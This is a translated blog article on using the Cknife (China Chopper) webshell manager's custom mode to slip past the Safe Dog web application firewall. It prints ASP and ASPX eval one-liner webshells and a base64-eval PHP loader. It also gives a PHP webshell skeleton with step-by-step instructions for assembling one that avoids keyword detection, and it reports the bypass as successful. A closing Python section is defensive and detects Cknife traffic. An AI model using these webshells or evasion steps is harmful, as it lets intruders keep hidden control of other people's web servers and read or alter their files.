Dog-Beating Staff Technique: Bypassing Safe Dog in Seconds with Cknife (C-knife) Custom Mode

Source: Internet
Author: User
Disclaimer: This site provides security tools, programs and methods that may be offensive in nature. They are provided only for security research and teaching, and use is at your own risk! Related reading:

Cross-platform Chinese kitchen knife Cknife released

Cknife, cross-platform Chinese kitchen knife open source

0x00 Preface

Many friends mistakenly thought that Cknife was merely a cross-platform upgrade of the kitchen knife (China Chopper) and that cross-platform support was its only feature. In fact they missed its essence: it is also a powerful WAF-bypass tool. I never explained how to use it, and that is my responsibility, so I have written the following article:

0x01

Cknife has two WAF-bypass modes: one modifies the configuration file (Config.ini), the other is the Customize mode. Today we take the custom mode as the example to explain how to bypass Safe Dog in seconds. Of course, once this article is published the major WAF vendors will certainly blacklist some of these characteristics; this is only a reference to provide ideas.

0x02 ReadMe.txt

Many friends seldom pay attention to the ReadMe when using the software. Here I have attached its content on WAF bypass; please read the highlighted (red) part carefully.

[A long passage is omitted here]

Instructions for use:

Server scripts supported: ASP, ASPX, PHP, JSP, and Customize (custom).

The server-side code includes but is not limited to the following (any eval-like function can be used, such as PHP's create_function and assert):

ASP:

<%eval request("Cknife")%>

ASP. NET:

<%@ Page Language="Jscript"%><%eval(Request.Item["Cknife"],"unsafe");%>

PHP:

 

JSP:

[For details about the code, see 1.jsp]

Customize:

Custom type. The function code is stored on the server. In theory every dynamic scripting language is supported, as long as the script interacts with Cknife correctly. This mode can be tailored as needed; for example, the code can be very short if you only need directory browsing or the virtual terminal.

WAF:

This is a cross-platform, configuration-file-driven Chinese kitchen knife. All operations are defined by the user; the main program only renders the interface and sends data.

I separated every step and wrote it into the configuration file. You can customize any of the code, including changing parameter names and content.

For example:

SKIN = javax.swing.plaf.nimbus.NimbusLookAndFeel    (sets the skin to Nimbus)
SPL = ->|                                            (the starting delimiter)
SPR = |<-                                            (the ending delimiter)
CODE = code                                          (the encoding parameter)
ACTION = action                                      (the action parameter)
PARAM1 = z1                                          (parameter 1)
PARAM2 = z2                                          (parameter 2)
PHP_BASE64 = 1                                       (when PHP is used, whether the z1 and z2 parameters are automatically base64-encoded; set it to 0 if you want to define your own encoding)
PHP_MAKE = @eval(base64_decode($_POST[action...      (the one-liner; you do not have to use this method, you can use any method you want)
PHP_INDEX = ...                                      (the code for the home-page display function goes here)
PHP_READDICT = ...                                   (the code for the read-directory function goes here)
PHP_READFILE = ...                                   (the code for the read-file function goes here)
PHP_DELETE = ...                                     (the code for deleting folders and files goes here)
PHP_RENAME = ...                                     (the code for renaming folders and files goes here)
PHP_NEWDICT = ...                                    (the code for the create-directory function goes here)
PHP_UPLOAD = ...                                     (the code for the file-upload function goes here)
PHP_DOWNLOAD = ...                                   (the code for the file-download function goes here)
PHP_SHELL = ...                                      (the code for the virtual terminal function goes here)
PHP_DB_MYSQL = ...                                   (the code for the MySQL database management function goes here)
ASP_... = ...
ASPX_... = ...
JSP_... = ...

In addition to modifying the preceding parameters, the program also provides the Customize WAF-bypass mode.

The Customize mode was originally designed to support script types that the program does not support by default, such as CFM, ASMX, ASHX, and PY, as long as the user-written script interacts correctly with the kitchen knife.

Put another way: if we write a PHP script that implements the list-file and list-directory functions itself, it can interact correctly with Cknife, but connecting with PHP (Eval) selected will fail.

Select Customize mode to connect instead. Why write so much code to connect in Customize mode? Because a powerful WAF detects keywords such as eval and assert.

In that case, you can implement the list-file and list-directory functions with ordinary code in the PHP script, and then connect in Customize mode to bypass the WAF.

As in the other modes, each step is written to the configuration file; you can also specify the parameter names and content.

For example, suppose you have written Customize.php, placed it on the server, and connect in Customize mode.

The parameters submitted to display the home page are password=1&action=index, and to read a directory, password=1&action=readdict.

If Cknife becomes popular, WAF vendors will certainly blacklist readdict. In that case you can rename readdict to something else, rename action as well, and change 1 to another value.

CUS_MAKE = 1
CUS_INDEX = index
CUS_READDICT = readdict
CUS_READFILE = readfile
CUS_SAVEFILE = savefile
CUS_DELETE = delete
CUS_RENAME = rename
CUS_UPLOAD = upload
CUS_DOWNLOAD = download
CUS_SHELL = shell

[A long passage is omitted here]

0x03 The WAF-bypass principle of custom mode

With a one-liner webshell, many vendors flag eval and other sensitive keywords in the file, as well as sensitive keywords in the packets in transit. We only need to implement the list-directory, read-file and other functions in the ordinary way, without eval or any other sensitive keyword, to bypass the WAF: the server does not host a one-liner at all; instead, the function code itself runs on the server and the client submits normal-looking packets.

0x04 Preparing to beat the dog

Some friends say that writing list-directory, read-file and the other functions themselves is beyond them. In fact you do not need to write anything yourself; you only need to copy, paste, and modify.

You need a little programming foundation (nothing more than understanding an if statement), and then fill in the framework I give below. Take PHP as an example.

The framework is as follows:

<?php
$pwd = 'cknive'; // password parameter name

if ($_POST[$pwd] == 1) {

    $act = $_POST['action']; // action name

    echo("->|"); // leading delimiter

    if ($act == 'index') { // home-page display function

    } else if ($act == 'readdict') { // read-directory function

    } else if ($act == '...') { // placeholder: the other functions you want to implement, decoded from Config.ini

    }

    echo("|<-"); // trailing delimiter

}
?>

First open the lovely Config.ini file and find PHP_INDEX.

This is the code for the home-page display in Cknife's file manager. We decode it first: URL-decode it, then base64-decode the result.

Paste the decoded result into Eclipse and auto-format it (right-click, Source -> Format).

Remove all the code before echo("->|") and all the code after echo("|<-"). Copy the code in between into the corresponding function of the framework.

Then find PHP_READDICT and decode it the same way. Note that here the base64_decode function wraps the z1 parameter. In our custom mode the parameters are transmitted as-is and base64 encoding is not applied automatically, so we need to remove the base64_decode function.

Same rule as before: remove all the code before echo("->|") and all the code after echo("|<-"), and copy the code in between into the corresponding function of the framework. Note that the base64_decode function has been removed.

Finally, add the read-file function in the same way, i.e. from PHP_READFILE.

Save the code as test.php and connect in custom mode.

Testing found no interception.

We then tried the one-liner connection and found that it is intercepted.
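From the defender's side, the article's own description of Config.ini (sections 0x02 and 0x04) and of the bypass principle (0x03) is enough to see why a keyword blacklist fails against custom mode and what still does work. The following Python is an added example, not code from Cknife or its author: it parses a constructed Config.ini excerpt, decodes a PHP_* value the way the article describes (URL-decode, then base64-decode), extracts the delimiters and action names, and runs three detectors over constructed request/response pairs. Only the key names (SPL, SPR, ACTION, PARAM1, PHP_INDEX, CUS_*) and the default delimiters come from the article; every value, request body and response body below is constructed for the demo.

```python
"""Turn a Cknife Config.ini into detection indicators and apply them to HTTP exchanges.

Added example for the article, not code from Cknife or the original post. The
Config.ini excerpt, the request/response bodies and all parameter values are
constructed for the demo; only the key names (SPL, SPR, ACTION, PARAM1, PHP_INDEX,
CUS_*) and the default delimiters ->| and |<- come from the article.
"""
import base64
from urllib.parse import parse_qs, quote, unquote

# Harmless stand-in for an encoded PHP_INDEX value. The article says the stored value
# is base64 inside URL-encoding, so we build it that way and decode in reverse order.
INDEX_PLAIN = 'echo("->|");/* home page code */echo("|<-");'
INDEX_ENCODED = quote(base64.b64encode(INDEX_PLAIN.encode()).decode(), safe="")

SAMPLE_CONFIG = """
SPL=->|
SPR=|<-
ACTION=action
PARAM1=z1
PARAM2=z2
PHP_BASE64=1
PHP_INDEX=%s
CUS_MAKE=1
CUS_INDEX=index
CUS_READDICT=readdict
CUS_READFILE=readfile
""" % INDEX_ENCODED

# Keywords a signature-only WAF looks for; the article's point is that custom mode
# never sends them, because the function code already lives on the server.
SENSITIVE_KEYWORDS = ("eval", "assert", "create_function")


def parse_config(text):
    """Minimal key=value parser for the flat Config.ini format shown in the article."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")) or "=" not in line:
            continue
        key, _, value = line.partition("=")
        cfg[key.strip()] = value.strip()
    return cfg


def decode_php_value(value):
    """Undo the encoding the article walks through by hand: URL-decode, then base64."""
    return base64.b64decode(unquote(value)).decode("utf-8", errors="replace")


def indicators(cfg):
    """Pull out what a defender can match on: delimiters, action parameter, action names."""
    actions = {v for k, v in cfg.items() if k.startswith("CUS_") and k != "CUS_MAKE"}
    return {
        "spl": cfg.get("SPL", "->|"),
        "spr": cfg.get("SPR", "|<-"),
        "action_param": cfg.get("ACTION", "action"),
        "actions": actions,
    }


def keyword_hit(request_body):
    """What a keyword blacklist sees: only the request bytes."""
    body = request_body.lower()
    return any(word in body for word in SENSITIVE_KEYWORDS)


def known_action_hit(request_body, ind):
    """Blacklist of the default action names (index, readdict, ...); defeated by renaming."""
    values = parse_qs(request_body).get(ind["action_param"], [])
    return any(v in ind["actions"] for v in values)


def framing_hit(response_body, ind):
    """Every Cknife response is bracketed by SPL ... SPR; this survives renamed actions."""
    start = response_body.find(ind["spl"])
    end = response_body.rfind(ind["spr"])
    return start != -1 and end > start


def classify(request_body, response_body, ind):
    """Run all three detectors on one request/response pair and report which fire."""
    return {
        "keyword": keyword_hit(request_body),
        "known_action": known_action_hit(request_body, ind),
        "framing": framing_hit(response_body, ind),
    }


# Constructed exchanges. The first follows the parameter layout the article gives
# (password=1&action=readdict); the second renames everything, as the article suggests.
CUSTOM_MODE = ("password=1&action=readdict&z1=/var/www/html", "->|index.php\nimages/\n|<-")
RENAMED = ("p=1&a=ls&z1=/var/www/html", "->|index.php\nimages/\n|<-")
# One-liner mode carries PHP in the request body, which is what the keyword rule catches.
ONE_LINER = ("Cknife=@eval(base64_decode($_POST[action]));&action=ZWNobyAxOw==", "->|1|<-")
BENIGN = ("user=bob&page=2", "<html><body>page 2</body></html>")


def run_demo():
    ind = indicators(parse_config(SAMPLE_CONFIG))
    samples = {"custom_mode": CUSTOM_MODE, "renamed": RENAMED,
               "one_liner": ONE_LINER, "benign": BENIGN}
    results = {name: classify(req, resp, ind) for name, (req, resp) in samples.items()}
    for name, flags in results.items():
        print(f"{name:12s} {flags}")
    return results


if __name__ == "__main__":
    run_demo()
```

The run shows the article's claim from the other side: the custom-mode and renamed exchanges trip neither the keyword rule nor, after renaming, the action-name rule, while the response framing still flags both. Note that SPL and SPR are themselves Config.ini keys, so the framing check can be defeated the same way the action names are; the durable control is on the server, where file-integrity monitoring of the web root catches the newly dropped script regardless of what the traffic looks like.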
